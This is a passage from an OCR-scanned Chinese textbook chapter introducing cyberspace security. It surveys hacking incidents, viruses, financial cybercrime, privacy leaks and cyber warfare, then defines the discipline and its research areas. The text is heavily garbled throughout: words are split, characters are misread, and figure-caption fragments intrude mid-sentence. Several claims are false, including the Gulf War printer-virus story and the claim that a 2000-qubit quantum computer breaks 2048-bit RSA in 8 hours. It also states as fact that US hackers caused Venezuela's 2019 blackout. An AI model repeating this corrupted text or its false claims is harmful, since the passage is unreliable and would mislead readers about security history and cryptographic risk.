利 前 进 的 步伐 。 

2. 黑客 攻击 

黑客 攻击 已 经 成 为 经 常 性 、 多 发 性 的 事件 。 目 前 在 我 国 ,只 要 是 全 国 性 或 国际 性 的 大 
型 活动 ,都 有 可 能 遭 到 大 量 的 黑客 的 攻击 。 即 使 是 体育 或 文艺 活动 ,也 会 遭 到 黑客 攻击 。 
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在 国际 上 ,黑客 曾经 攻破 许多 国家 的 政府 网 站 ,造成 极 大 的 不 良 影响 。2011 年 6 月 , 据 国 
外 媒体 报道 ,黑客 集团 Lulz Security 与 Anonymous 相互 结盟 ,把 攻击 目标 锁定 为 世界 各 
国 的 政府 网 站 。 但 是 ,对 国计民生 影响 最 大 的 是 对 工业 控制 系统 的 攻击 ,如 下 是 一 些 代表 
性 事件 。 

。 2007 年 ,黑客 人 侵 加 拿 大 一 个 水 利 SCADA 控制 系统 ,破坏 了 取水 调度 的 控制 计 
算 机 。 

* 2008 年 ,黑客 人 侵 波兰 某 城 市 地 铁 系 统 ,通过 电视 遥控 器 改变 轨道 扳 道 器 ,致使 4 
节 车 厢 脱 轨 。 

* 2010 年 ,黑客 人 侵 伊朗 布什 尔 核 工厂 的 工业 控制 计算 机 ,利用 Stuxnet 病毒 ,摧毁 
了 其 大 部 分 铀 浓缩 离心 机 , 重 挫 了 伊朗 的 核 计划 。 

。 2011 年 ,黑客 人 侵 美 国 伊 利 诺 伊 州 城市 供水 系统 的 数据 采集 与 监控 系统 ,使 其 供 
水 泵 遭 到 破坏 。 

* 2012 年 ,黑客 人 侵 两 座 美 国电 厂 ,利用 USB 病毒 感染 了 每 个 工厂 的 工控 系统 , 影 
响 了 正常 发 电 , 并 穷 取 了 经 济 数据 。 

* 2015 年 ,黑客 人 侵 德国 一 家 钢 厂 ,操控 并 干扰 了 工厂 的 控制 系统 ,不 让 高 炉 正常 
关闭 。 造 成 的 不 只 是 经 济 损失 ,还 有 设备 及 人 身 安全 问题 。 此 次 事件 导致 该 工厂 
损失 惨重 。 

* 2015 年 12 月 23 日 ,乌克兰 西部 电力 系统 遭受 黑客 攻击 ,造成 大 面积 停电 ,影响 
140 万 人 ,停电 时 间 长 达 6 小时。 

* 2019 4E 3 月 ,委内瑞拉 遭 到 美国 网 络 黑客 攻击 ,全 国 出 现 大 规模 停电 ,直接 导致 交 
通 、 医 疗 、 通 信 及 基础 设施 的 瘫痪 。 


3. 病毒 入 侵 

计算 机 病毒 人 侵 是 人 们 普遍 遭受 过 的 信息 安全 事件 ,计算 机 病毒 等 恶意 代码 是 黑客 
攻击 的 主要 武器 之 一 。 目 前 ,计算 机 病毒 已 超过 几 万 种 ,而 且 还 在 继续 增加 。 追 求 经 济 和 
政治 利益 成 为 研制 和 使 用 计算 机 病毒 的 新 特征 。 恶 意 软件 的 开发 .生产 、 销 售 , 形 成 了 一 
条 地 下 产业 链 。 这 是 值得 我 们 认真 对 付 的 。 

理论 上 ,任何 算法 既 可 以 用 软件 实现 ,也 可 以 用 硬件 实现 。 因 此 ,计算 机 病毒 可 以 成 
为 软件 形式 ,也 可 以 成 为 硬件 形式 。 软 件 设 计 硬 件 技术 (EDA) 和 可 编程 集成 电路 技术 
CPLD) 的 发 展 与 应 用 ,为 硬件 病毒 奠定 了 技术 和 物质 基础 。 与 软件 病毒 相 比 ,硬件 病毒 更 
难 检测 ,而 且 无 法 清除 。 我 国 大 量 使 用 国外 集成 电路 ,因此 遭受 硬件 病毒 攻击 的 风险 
很 大 。 

4. 利用 计算 机 进行 经 济 犯罪 

利用 计算 机 进行 经 济 犯 罪 的 数量 已 经 超过 了 传统 经 济 犯 罪 的 数量 。 目 前 ,网 上 银行 
和 电信 诈骗 是 恶性 案件 的 高 发 区 。 钓 鱼网 站 伪造 银行 卡 、 网 络 诈骗 ,电信 诈骗 等 犯罪 行 
为 ,给 人 民 和 群众 造成 严重 经 济 损失 。 

2016 年 2 月 ,黑客 利用 获得 的 孟加拉 中 央 银 行 的 SWIFT 密码 ,企图 进行 5 次 转账 ， 
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转 走 9.51 亿美 元 。 后 来 ,转账 企图 被 发 现 , 最 终 成 功 转 走 了 1.01 亿美 元 。 还 有 黑客 用 类 
似 的 手法 从 俄罗斯 中 央 银 行 盗 走 20 亿 卢 布 。 


5. 网 络 上 的 有 害 内 容 泛滥 

网 络 上 的 有 害 内 容 泛滥 ,垃圾 邮件 满天飞 ,网 络 环境 吸 待 规范 和 治理 。 创 建 网 络 精 神 
文明 成 为 我 们 的 一 项 重要 任务 。 在 国外 ,一 些 国家 的 “颜色 革命 "都 是 伴随 着 网 络 上 的 “ 颜 
色 和 与 论 ” 而 发 生 的 。 


6. 隐私 保护 问题 严重 

隐私 保护 问题 十 分 严重 。 在 国内 外 已 经 发 生 多 起 个 人 隐私 数据 被 泄露 的 严重 事件 。 
例如 ,2018 4E 3 月 , 爆 出 美国 Facebook 公司 泄露 了 8000 万 用 户 个 人 数据 的 丑闻 ,给 用 户 
造成 不 可 估量 的 损失 。 在 我 国 也 有 不 法 分 子 在 网 上 公开 出 售 个 人 信息 数据 ,严重 侵犯 了 
公民 的 隐私 权 , 由 此 引发 了 大 量 恶 性 治安 事件 ,严重 扰乱 了 社会 治安 。 更 普遍 的 一 个 问题 
是 ,几乎 所 有 的 手机 用 户 都 收 到 过 骚扰 电话 ,这 也 是 个 人 隐私 (手机 号 码 ) 汇 露 所 造成 的 。 


7. 信息 战 、 网 络 战 已 经 开始 
信息 技术 的 发 展 推动 了 军事 革命 ,出 现 了 信息 战 .网 络 战 等 新 型 战 法 和 网 军 等 新 型 军 
兵种 。 早 在 1991 年 海湾 战争 后 ,美国 军 方 就 提出 信息 战 的 概念 ,并 于 1995 年 成 立 了 信息 
作战 指导 委员 会 。2009 年 10 月 ,美国 正式 成 立 网 络 作战 司令 部 。2011 4E 5 H 16 日 , 美 
国 公布 了 “网 络 空间 国际 战略 ”,7 月 14 日 公布 了 * 网 络 空间 作战 战略 ”, 提 出 “陆海空 、 
天 、 网 ”5 维 一 体 的 美国 国家 安全 概念 。2017 年 8 月 18 日 ,美国 总 统 特 朗 普 批准 ,将 网 络 
作战 司令 部 升级 为 美军 第 十 个 联合 作战 司令 部 之 一 ,地 位 与 中 央 司 令 部 等 主要 作战 司令 
部 持平 。 这 意味 着 ,美国 真正 将 网 络 空间 、 陆 地 ,海洋 、 天 空 .太空 ,并 列 为 美军 五 大 战场 。 
we 12018 年 , 特 朗 普 又 赋予 军 方 可 以 不 受阻 挠 
j 地 部 署 网 络 武器 的 自由 。 美 国正 加 速 将 全 
f 球 拖 入 一 场 网 络 战争 。 图 1-7 为 美国 网 络 
M ' 作战 部 队 。 
M6 : 两 次 海湾 战争 和 科索沃 战争 中 ,美国 
e | [R4 都 成 功 实施 了 信息 作战 。 
CMS c 早 在 1991 年 的 第 一 次 海湾 战争 中 , 美 
; 军 就 对 伊拉克 实施 了 信息 作战 。 在 第 一 次 
海湾 战争 前 ,伊拉克 与 美国 关系 恶化 ,而 与 
图 1-7 美军 网 络 作战 部 队 法 国 关系 较 好 。 伊 拉克 军 方 通过 法 国 ,从 
美国 进口 了 一 批 计算 机 打印 设备 ,通过 约 
旦 转口 到 伊拉克 。 这 个 信息 被 美军 截获 。 美 军 随 即 派遣 间谍 潜 入 约旦 ,把 这 些 打印 设备 
调包 成 芯片 内 含有 计算 机 病毒 的 打印 设备 。 这 些 打印 机 被 伊拉克 毫 无 防范 地 连接 到 军 方 
的 计算 机 上 。 开 战 前 ,美军 利用 卫星 激活 了 藏 在 打印 机 芯片 中 的 计算 机 病毒 。 病 毒 导致 
伊拉克 的 防空 指挥 系统 瘫 凋 , 使 伊拉克 军队 处 于 完全 被 动 挨 打 的 地 位 。 综 观 这 场 战争 可 
知 ,计算 机 病毒 是 美国 打击 伊拉克 的 第 一 批 巡 航 导弹 ”。 
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8. 科学 技术 进步 对 信息 安全 的 挑战 

科学 技术 的 进步 也 对 信息 安全 提出 了 新 的 挑战 。 由 于 量子 计算 机 具有 并 行 性 ,如 果 
量子 计算 机 的 规模 进一步 提升 , 则 许多 现 有 公 钥 密码 (RSA、ElGamal、ECC 等 ) 将 不 再 
安全 。 

理论 分 析 表 明 ,1448 位 的 量子 计算 机 可 以 攻破 256 位 的 ECC 密码 ,2048 位 的 量子 计 
算 机 可 以 攻破 1024 位 的 RSA 密码 。 

值得 注意 的 是 : 我 国 第 二 代 居 民 身 份 证 采用 了 256 位 的 ECC 密码 。 许 多 国际 电子 
商务 系统 采用 了 1024 位 的 RSA 密码 。 

2019 年 6 月 2 日 ,美国 谷歌 公司 和 瑞典 的 科学 家 找到 一 种 方法 ,用 2000 位 的 量子 计 
算 机 在 8 小 时 内 可 破译 2048 位 的 RSA 密码 。 

这 些 都 说 明 ,量子 计 算 机 技术 的 发 展 对 信息 安全 提出 了 新 的 挑战 。 

即使 到 了 量子 计算 时 代 ,我 们 仍然 需要 确保 信息 安全 ,仍然 需要 使 用 密码 。 但 是 ,在 
量子 计算 时 代 使 用 什么 密码 将 是 摆 在 我 们 面前 的 重大 战略 问题 。 显 然 ,我们 应 当 未 雨 绸 
绷 , 现 在 就 要 研究 能 够 抵抗 量子 计算 机 攻击 的 安全 密码 ,确保 我 国 在 量子 计算 时 代 的 信息 
安全 。 

另外 , 随 着 信息 技术 的 发 展 ,出 现 了 云 计算 、 物 联网 .大 数据 和 人 工 智能 等 新 热点 。 由 
于 它们 的 系统 特点 和 工作 环境 不 同 ,又 引发 出 许多 新 的 信息 安全 问题 和 需求 。 如 果 这 些 
问题 不 解决 ,将 影响 这 些 系统 的 正常 应 用 。 


9. 我 国 在 信息 领域 核心 技术 的 差距 ,加 剧 了 我 国信 息 安 全 的 严峻 性 

对 于 我 国 来 说 ,信息 安全 形势 的 严峻 性 ,不仅 在 于 以 上 这 些 威胁 ,还 在 于 我 国 在 核心 
技术 方面 的 差距 。 

2016 年 ,习近平 总 书记 指出 :“ 同 世界 先进 水 平 相 比 , 同 建设 网 络 强国 战略 目标 相 
比 , 我 们 在 很 多 方面 还 有 不 小 差距 ,特别 是 在 互联 网 创新 能 力 、 基 础 设施 建设 .信息 资源 共 
享 、 产 业 实力 等 方面 还 存在 不 小 差距 ,其 中 最 大 的 差距 在 核心 技术 上 。” 

由 于 我 国 在 核心 技术 方面 与 国外 相 比 存在 差距 ,我 国 不 得 不 在 CPU 芯片 、 操 作 系 
At 数据库 等 基础 软件 和 EDA 等 关键 应 用 软件 方面 大 量 使 用 国外 产品 ,这 就 使 我 国 的 信 
息 安 全 形势 更 加 严峻 复杂 。Windows 操作 系统 存在 漏洞 是 大 家 熟知 的 ,使 用 Windows 十 
Office 的 用 户 几乎 每 周 都 要 打 补 丁 ,这 是 大 家 都 很 头疼 而 又 无 奈 的 事 。2017 年 ,业界 揭 
露出 Intel 公司 的 CPU 芯片 存在 两 个 重大 安全 漏洞 。2018 年 ,美国 挑 起 了 与 我 国 的 贸易 
摩擦 ,制裁 打压 我 国企 业 ,给 华为 ,中兴 等 企业 断 供 的 事件 ,使 我 们 更 清楚 地 看 到 这 一 问题 
的 严重 性 。 


1.1.3. 我国 重视 信息 安全 
我 国政 府 历来 高 度 重视 信息 安全 。2002 年 ,党 的 十 六 大 文件 已 经 把 信息 安全 作为 我 
国 国家 安全 的 重要 组 成 部 分 。2012 年 ,党 的 十 八大 文件 进一步 明确 指出 ,要 “高 度 关注 海 
洋 、 太 空 .网络 空间 安全 ”。2013 年 底 , 中 央 网 络 安全 与 信息 化 领导 小 组 成 立 ,负责 统一 领 
导 我 国 网 络 安全 与 信息 化 工作 。2014 年 ,习近平 总 书记 在 中 央 网 络 安全 与 信息 化 领导 小 
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组 第 一 次 会 议 上 指出 :“ 没 有 网 络 安 全 ,就 没有 国家 安全 。 没 有 信息 化 ,就 没有 现代 化 。” 
2016 年 11 月 7 日 ,我 国 颁布 7 了 《中 华人 民 共 和 国 网 络 安全 法 ), 这 是 确保 我 国 网 络 安 全 的 
基本 法 律 。2016 年 12 月 27 日 ,国家 互联 网 信息 办 公 室 和 中 央 网 络 安 全 与 信息 化 领导 小 
组 办 公 室 联合 发 布 了 我 国 的 《国家 网 络 空间 安全 战略 》。 文 件 明确 了 确保 我 国 网 络 空间 安 
全 和 建设 网 络 强国 的 战略 目标 。2017 年 3 月 1 日 ,外 交 部 和 国家 互联 网 信息 办 公 室 共同 
发 布 了 《国家 网 络 空间 国际 合作 战略 》。 文 件 明确 规定 了 我 国 在 网 络 空间 领域 开展 国际 交 
流 合作 的 战略 目标 和 中 国 主张 。2017 年 10 月 18 H ,习近平 总 书记 在 十 九 大 报告 中 再 次 
强调 ,“ 加 快 建设 创新 型 国家 和 网 络 强 国 ,确保 我 国 的 网 络 空间 安全 ”"。2018 年 3 H 21 
日 ,中 央 决 定 : 中 央 网 络 安 全 与 信息 化 领导 小 组 改组 为 中 央 网 络 安 全 与 信息 化 委员 会 , 负 
责 相 关 领 域 重 大 工作 的 顶层 设计 、 总 体 布局 ,统筹 协调 、 整 体 推进 、 监 督 落实 。 这 一 变动 意 
味 着 ,其 指导 网 络 安 全 和 信息 化 的 职能 将 进一步 加 强 。2018 年 4 月 20 日 ,习近平 总 书记 
在 网 络 安全 与 信息 化 委员 会 工作 会 议 上 指出 :“ 要 主动 适应 信息 化 要 求 ,强化 互联 网 思 
维 ,不 断 提高 对 互联 网 规律 的 把 握 能 力 、 对 网 络 和 与 论 的 引导 能 力 、 对 信息 化 发 展 的 驾驭 能 
力 、 对 网 络 安全 的 保障 能 力 。 核 心 技 术 是 国之 重 器 。 没 有 核心 技术 ,只 能 受制 于 人 。 要 下 
决心 ,保持 恒心 , 找 准 重心 ,加 速 推 动 信息 领域 核心 技术 突破 。” 
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网 络 空间 安全 事 关 国家 安全 、 社 会 稳定 、 经 济 发 展 和 公众 利益 。 我 们 必须 加 快 国家 网 
络 空 间 安全 保障 体系 建设 ,确保 我 国 的 网 络 空间 安全 。 

确保 我 国 网 络 空间 安全 ,人 才 是 第 一 要 素 。 因 此 ,网 络 空间 安全 人 才 培 养 是 我 国 国家 
网 络 空间 安全 保障 体系 建设 的 必 备 基础 和 先决 条 件 。 网 络 空间 安全 学 科 与 专业 则 是 网 络 
空间 安全 人 才 培 养 的 基础 平台 。 


1.2.1 网 络 空间 与 网 络 空间 安全 的 概念 


为 了 刻画 人 类 生存 的 信息 环境 或 信息 空间 ,人 们 创造 了 Cyberspace 一 词 。 早 在 1982 
年 ,加 拿 大 作家 威廉 .吉布森 在 其 短篇 科幻 小 说 《燃烧 的 铬 》 中 首次 创造 使 用 了 
Cyberspace 一 词 , 意 指 由 计算 机 创建 的 虚拟 信息 空间 。Cyberspace 在 这 里 强调 计算 机 爱 
好 者 在 游戏 机 前 体验 到 交感 幻觉 ,体现 了 Cyberspace 不 仅 是 信息 的 简单 聚合 体 , 也 包含 
了 信息 对 人 类 思想 认 知 的 影响 。 此 后 , 随 着 信息 技术 的 快速 发 展 和 互联 网 的 广泛 应 用 ， 
Cyberspace 的 概念 不 断 丰富 和 演化 。 

2008 年 ,美国 第 54 号 总 统 令 对 Cyberspace 进行 了 定义 : Cyberspace 是 信息 环境 中 
的 一 个 整体 域 , 它 由 独立 且 互 相依 存 的 信息 基础 设施 和 网 络 组 成 ,包括 互联 网 ,电信 网 、 计 
算 机 系统 ,嵌入 式 处 理 器 和 控制 器 系统 。 我 们 认为 ,这 一 定义 总 体 是 合理 的 ,但 列 出 许多 
有 具体 系统 和 网 络 的 做 法 ,比较 烦琐 。 而且, 随 着 信息 技术 的 发 展 还 会 出 现 新 的 系统 和 新 的 
网 络 ,又 需要 对 定义 进行 修改 和 调整 。 显 然 ,这 是 不 必要 的 。 

除了 美国 之 外 ,还 有 许多 国家 也 对 Cyberspace 进行 了 定义 和 解释 ,但 与 美国 的 说 法 


大 同 小 异 、 各 有 侧重 。 

我 们 给 出 自己 的 定义 : 网 络 空 间 (Cyberspace) 是 信息 时 代 人 们 赖 以 生存 的 信息 环 
境 , 是 所 有 信息 系统 的 集合 。 这 样 既 抓 住 了 信息 环境 和 信息 系统 这 两 大 核心 内 容 , 而 且 表 
述 简洁 ,无 须 随 着 新 系统 和 新 网 络 的 出 现 而 重新 修改 和 调整 定义 。 

因此 ,把 Cyberspace 翻译 成 信息 空间 或 网 络 空 间 比 较 好 ,信息 空间 突出 了 信息 环境 
和 信息 系统 这 两 大 核心 内 容 , 网 络 空间 突出 了 网 络 互联 这 一 重要 特征 。 

众所周知 ,能 源 、 材 料 、 信 息 是 支撑 现代 社会 的 支柱 ,其 中 ,能 源 和 材料 是 物质 的 .具体 
的 ,而 信息 是 逻辑 的 .抽象 的 。 信 息 论 是 信息 科学 的 理论 基础 , 它 告 诉 我 们 ,系统 是 载体 ， 
信息 是 内 涵 ,信息 不 能 脱离 系统 而 孤立 存在 。 

人 身 安 全 是 我 们 最 关心 的 事情 ,而且 也 是 我 们 最 熟悉 的 安全 问题 。 人 身 安全 是 人 对 
其 生存 环境 的 基本 要 求 , 即 要 确保 人 身 免 受 其 生存 环境 的 危害 。 因 此 ,哪里 有 人 ,哪里 就 
存在 人 身 安 全 问题 ,人 身 安全 是 人 的 影子 。 同 样 ,信息 安全 是 信息 对 其 生存 环境 的 基本 要 
求 , 即 要 确保 信息 免 受 其 生存 环境 的 危害 。 因 此 ,哪里 有 信息 ,哪里 就 存在 信息 安全 问题 ， 
信息 安全 是 信息 的 影子 。 

网 络 空间 既是 人 的 生存 环境 ,也 是 信息 的 生存 环境 ,因此 ,网 络 空间 安全 是 人 和 信息 
对 网 络 空间 的 基本 要 求 。 网 络 空间 是 所 有 信息 系统 的 集合 ,是 复杂 的 巨 系统 ,所 以 网 络 空 
间 的 信息 安全 问题 更 加 突出 。 

根据 信息 论 的 基本 观点 ,系统 是 载体 ,信息 是 内 涵 0。 因此 ,网 络 空间 安全 的 核心 内 涵 
仍 是 信息 安全 ,没有 信息 安全 就 没有 网 络 空间 安全 。 


1.2.2. 网络 空间 安全 学 科 内 酒 


星期 传统 的 信息 安全 强调 信息 (数据 ) 本 身 的 安全 属性 ,认为 信息 安全 主要 研究 确保 
信息 的 以 下 属性 : 

CD 秘密 性 : 信息 不 被 未 授权 者 知晓 的 属性 。 

@ 完整 性 : 信息 是 正确 的 .真实 的 ,未 被 自 改 的 .完整 无 缺 的 属性 。 

C 可 用 性 : 信息 可 以 随时 正常 使 用 的 属性 。 

信息 论 的 基本 观点 告诉 我 们 : 信息 不 能 脱离 它 的 载体 而 孤立 存在 。 因 此 ,我 们 不 能 
脱离 信息 系统 而 孤立 地 谈论 信息 安全 。 也 就 是 说 ,每 当 我 们 谈论 信息 安全 时 ,一定 不 能 回 
避 信 息 系统 的 安全 问题 。 这 是 因为 ,如 果 信 息 系统 的 安全 受到 危害 , 则 必然 会 危害 到 存在 
于 信息 系统 之 中 的 信息 的 安全 。 据 此 ,应 当 从 信息 系 


统 角度 来 全 面 考虑 信息 安全 的 内 涵 。 ERE 
从 纵向 来 看 ,信息 系统 安全 主要 包括 以 下 4 个 层 - 
面 : 设备 安全 .数据 安全 ,行为 安全 和 内 容 安全 。 其 
中 ,数据 安全 即 是 早期 的 信息 安全 。 信 息 系统 安全 的 
层次 结构 如 图 1-8 所 示 。 i 
1. 设备 安全 设备 安全 
信息 系统 设备 ( 硬 设备 和 软 设备 ) 的 安全 是 信息 系 ”图 1-8 信息 系统 安全 的 层次 结构 
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统 安全 的 首要 问题 。 这 里 包括 三 个 方面 : 

(D 设备 的 稳定 性 : 设备 在 一 定时 间 内 不 出 故障 的 概率 。 

@ 设备 的 可 靠 性 : 设备 能 在 一 定时 间 内 正确 执行 任务 的 概率 。 

@ 设备 的 可 用 人 性: 设备 随时 可 以 正确 使 用 的 概率 。 

2. 数据 安全 

数据 安全 指 采取 措施 确保 数据 免 受 未 授权 的 泄露 . 自 改 和 毁坏 。 

CD 数据 的 秘密 性 : 数据 不 被 未 授权 者 知晓 的 属性 。 

Q 数据 的 完整 性 : 数据 是 正确 的 、 真 实 的 、 未 被 自 改 的 .完整 无 缺 的 属性 。 

@ 数据 的 可 用 人 性: 数据 可 以 随时 正常 使 用 的 属性 。 

3. 行为 安全 

行为 安全 从 主体 行为 的 过 程 和 结果 来 考察 是 否 会 危害 信息 安全 ,或 者 是 否 能 够 确保 
信息 安全 。 从 行为 安全 的 角度 来 分 析 和 确保 信息 安全 ,符合 哲学 上 实践 是 检验 真理 唯一 
标准 的 基本 原理 。 

@ 行为 的 秘密 性 : 行为 的 过 程 和 结果 不 能 危害 数据 的 秘密 性 ,必要 时 行为 的 过 程 和 
结果 也 应 是 保密 的 。 

Q 行为 的 完整 性 : 行为 的 过 程 和 结果 不 能 危害 数据 的 完整 性 ,行为 的 过 程 和 结果 是 
预期 的 。 

@ 行为 的 可 控 性 : 当 行为 的 过 程 偏离 预期 时 ,能够 发 现 , 控 制 或 纠正 。 


4. 内 容 安全 

内 容 安全 是 信息 安全 在 政治 .法律 .道德 层次 上 的 要 求 ,是 语义 层次 的 安全 。 

CD 信息 内 容 在 政治 上 是 健康 的 。 

@ 信息 内 容 符合 国家 法 律 法 规 。 

@ 信息 内 容 符合 中 华 民 族 优良 的 道德 规范 。 

根据 上 面 的 分 析 , 要 确保 信息 安全 ,就 必须 确保 信息 系统 的 安全 ,也 就 是 必须 确保 信 
息 系统 的 设备 安全 数据 安全 ,行为 安全 和 内 容 安全 。 

人 们 通过 长 期 的 信息 安全 实践 ,总 结 出 信息 安全 领域 的 一 些 共 同性 的 规律 。 受 物理 
学 等 许多 领域 中 普遍 有 三 大 定律 的 启发 ,作者 也 把 这 些 信 息 安全 领域 的 共同 性 的 规律 称 
为 信息 安全 三 大 定律 ,目的 是 使 之 更 加 醒目 和 便于 记忆 。 遵 循 这 些 定律 的 指导 ,有 利于 我 
们 把 信息 安全 工作 做 好 。 这 三 大 定律 是 : 

(D 信息 安全 的 普遍 性 定律 : 哪里 有 信息 ,哪里 就 有 信息 安全 问题 。 

@ 信息 安全 的 中 性 定律 : 安全 与 方便 是 一 对 矛盾 。 

@ 信息 安全 的 就 低 性 定律 ( 木 桶 原理 ): 信息 系统 的 安全 性 取决 于 最 薄弱 部 分 的 安 
全 性 。 

信息 论 的 基本 观点 还 告诉 我 们 : 信息 只 有 存储 ,传输 和 处 理 三 种 状态 。 因 此 ,要 确保 
信息 安全 ,就 必须 确保 信息 在 存储 、 传 输 和 处 理 三 种 状态 下 的 安全 。 

据 此 ,我 们 给 出 网 络 空间 安全 学 科 的 定义 : 网 络 空间 安全 学 科 是 研究 信息 存储 、 信 息 
传输 和 信息 处 理 中 的 信息 安全 保障 问题 的 一 门 新 兴学 科 。 网 络 空间 安全 学 科 是 融合 计算 
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机 、 通 信 、 电 子 . 数 学 ,物理 生物、 管理、 法律 和 教育 等 学 科 , 并 发 展演 绎 而 形成 的 交叉 学 
科 。 网 络 空间 安全 学 科 与 这 些 学 科 既 有 紧密 的 联系 和 渊源 ,又 具有 本 质 的 不 同 ,从 而 构成 
了 一 个 独立 的 学 科 。 网 络 空间 安全 学 科 具 有 自己 特有 的 理论 .技术 和 应 用 ,并 服务 于 信息 
社会 。 

目前 ,我 国 网 络 空间 安全 学 科 领 域 的 本 科 专 业 有 信息 对 抗 技术 专业 、 信 息 安 全 专业 、 
保密 管理 专业 、 网 络 安全 与 执法 专业 和 网 络 空间 安全 专业 。 

网 络 空间 安全 学 科 属 于 工学 。 但 考虑 到 网 络 空间 安全 学 科 的 多 学 科 交 叉 性 和 现 阶段 
我 国 网 络 空间 安全 学 科 下 属 专业 的 实际 情况 ,允许 学 校 给 相应 专业 的 毕业 生 授 予 工学 、 理 
学 或 管理 学 学 士 学 位 。 

专业 与 学 科 有 着 密切 的 关系 ,但 两 者 又 是 不 同 的 事物 。 学 科 是 科学 层面 的 概念 , 它 有 
明确 独立 的 内 涵 、 研 究 方向 及 内 容 、 理 论 基础 和 方法 论 基 础 。 专 业 是 培养 本 学 科 领 域 专业 
人 才 的 教育 组 织 实施 形式 。 专 业 的 设置 必须 遵循 以 下 两 点 : 一 是 ,专业 的 方向 与 内 容 要 
符合 本 学 科 的 方向 与 内 容 ; 二 是 ,专业 的 设置 必须 适应 社会 对 人 才 的 需求 。 因 此 ,一 个 学 
科 下 面 允许 设置 一 个 或 多 个 专业 ,专业 的 名 称 可 以 与 学 科 名 称 相 同 ,也 可 以 与 学 科 名 称 不 
同 。 例 如 计算 机 学 科 , 学 科 名 称 是 计算 机 科学 与 技术 ,目前 设置 的 专业 有 : 计算 机 科学 与 
技术 、 计 算 机 技术 、 计 算 机 工程 计算 机 应 用 、 计 算 机 软件 .网络 工程 和 多 媒体 技术 等 。 


1.2.3 ”网络 空 间 安全 学 科 的 主要 研究 方向 及 研究 内 容 


当前 ,网 络 空间 安全 学 科 的 主要 研究 方向 有 : 密码 学 、 网 络 安全 、 系 统 安全 、 内 容 安全 
和 信息 对 抗 。 可 以 预计 , 随 着 网 络 空 间 安全 科学 技术 的 发 展 和 应 用 ,一 定 还 会 产生 新 的 网 
络 空 间 安全 研究 方向 ,网 络 空间 安全 学 科 的 研究 内 容 将 更 加 丰富 。 

下 面 分 别 介绍 这 5 个 研究 方向 的 研究 内 容 。 


1. 密码 学 

密码 学 由 密码 编码 学 和 密码 分 析 学 组 成 ,其 中 ,密码 编码 学 主要 研究 对 明文 信息 进行 
编码 以 实现 信息 隐蔽 ,而 密码 分 析 学 主要 研究 通过 密 文 获取 对 应 的 明文 信息 。 密 码 学 研 
究 密 码 理论 .密码 算法 .密码 协议 .密码 技术 以 及 密码 应 用 等 科学 技术 问题 。 其 主要 研究 
内 容 有 : 

CD 对 称 密码 ; 

Q 公 钥 密码 ; 

@ 哈 希 函 数 ; 

CD 密码 协议 ; 

C 新 型 密码 : 生物 密码 .量子 密码 ,混沌 密码 等 ; 

@ 密码 管理 ; 

CD 密码 应 用 。 

2. 网 络 安全 

网 络 安全 的 基本 思想 是 ,针对 不 同 的 应 用 在 网 络 的 各 个 层次 和 范围 内 采取 防护 措施 ， 
以 便 能 够 对 各 种 网 络 安全 威胁 进行 检测 发 现 ,并 采取 相应 的 响应 措施 ,确保 网 络 设备 安 

11 


mum 网 络 空间 安全 导论 m————— 


全 网络 通 信和 链 路 安全 和 网 络 的 信息 安全 。 其 中 ,防护 ,检测 和 响应 都 需要 基于 一 定 的 安 
全 策略 和 安全 机 制 。 网 络 安全 的 研究 包括 网 络 安全 威胁 网络 安全 理论 .网络 安 全 技术 和 
网 络 安全 应 用 等 。 其 主要 研究 内 容 有 : 

(D 网 络 安全 威胁 ; 

Q 通信 安全 ; 

Q 协议 安全 ; 

CD 网 络 防护 ; 

@ 入 侵 检测 与 态势 感知 ; 

@ 应 急 响应 与 灾难 恢复 ; 

CD 可 信 网 络 ; 

@ 网 络 安全 管理 。 


3. 系统 安全 

这 里 的 系统 是 指 以 计算 机 为 中 心 的 各 种 实际 信息 系统 ,而 1.2.2 节 中 的 信息 系统 是 
一 种 抽象 的 系统 , 它 包含 所 有 的 信息 系统 ,两 者 的 区 别 是 明显 的 。 

在 以 计算 机 为 中 心 的 各 种 实际 信息 系统 中 ,有 些 系 统 是 规模 较 小 的 , 它 可 能 就 是 一 台 
计算 机 和 一 些 应 用 软件 。 有 些 系统 是 复杂 庞大 的 ,例如 电子 商务 系统 .电子 政务 系统 、 云 
计算 系统 、 大 数据 处 理 系统 等 。 

系统 是 信息 的 载体 ,因此 系统 应 当 确 保存 在 于 其 中 的 信息 的 安全 。 系 统 安全 的 特点 
是 从 系统 的 底层 和 整体 上 考虑 信息 安全 威胁 并 采取 综合 防护 措施 。 它 研究 系统 的 安全 威 
胁 、 系 统 安全 的 理论 .系统 安全 的 技术 和 应 用 。 其 主要 研究 内 容 有 

CD 系统 的 安全 威胁 ; 

Q 系统 的 设备 安全 ; 

@ 系统 的 硬件 子 系统 安全 ; 

(D 系统 的 软件 子 系统 安全 ; 

C 访问 控制 ; 

@ 可 信 计 算 ， 

(D 系统 安全 等 级 保护 ; 

@ 系统 安全 测评 认证 ; 

@ 应 用 信息 系统 安全 。 

4. 内 容 安全 

信息 内 容 安全 简称 内 容 安 全 , 它 是 信息 安全 在 政治 ,法律 .道德 层次 上 的 要 求 。 我 们 
要 求 信 息 内 容 是 安全 的 ,就 是 要 求 信 息 内 容 在 政治 层面 是 健康 的 ,在 法 律 层 面 是 符合 我 国 
法 律 法 规 的 ,在 道德 层面 是 符合 中 华 民族 优良 的 道德 规范 的 。 因 此 ,信息 内 容 安全 是 信息 
在 语义 层次 上 的 安全 。 

1995 年 ,西方 七 国信 息 会 议 首次 提出 “数字 内 容 产 业 ”(Digital Content Industry) 的 
概念 。 我 国 将 "数字 内 容 产业 ?定义 为 基于 数字 化 、 网 络 化 ,利用 信息 资源 创意 .制作 、 开 
发 分销、 交易 的 产品 和 服务 的 产业 。 显 然 , 数 字 内 容 产业 需要 信息 内 容 安全 来 保障 。 若 
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不 能 确保 信息 内 容 的 安全 ,将 不 能 确保 数字 内 容 产 业 的 健康 发 展 。 

目前 学 术 界 对 内 容 安 全 的 认识 尚 不 一 致 。 广 义 的 内 容 安全 既 包 括 信息 内 容 在 政治 、 
法 律 和 道德 方面 的 要 求 , 也 包括 信息 内 容 的 保密 、 知 识 产 权 保 护 、 隐 私 保护 等 多 方面 。 我 
们 这 里 主要 强调 内 容 安全 中 的 基本 理论 、 基 本 技术 和 基本 应 用 。 其 主要 研究 内 容 有 : 

中 内 容 安全 的 威胁 ; 

Q 内 容 的 获取 ; 

C 内 容 的 分 析 与 识别 ; 

@ 内 容 安 全 管理 ; 

@ 信息 隐藏 ; 

@ 隐私 保护 ; 

C 内 容 安 全 的 法 律 保障 。 


5. 信息 对 抗 

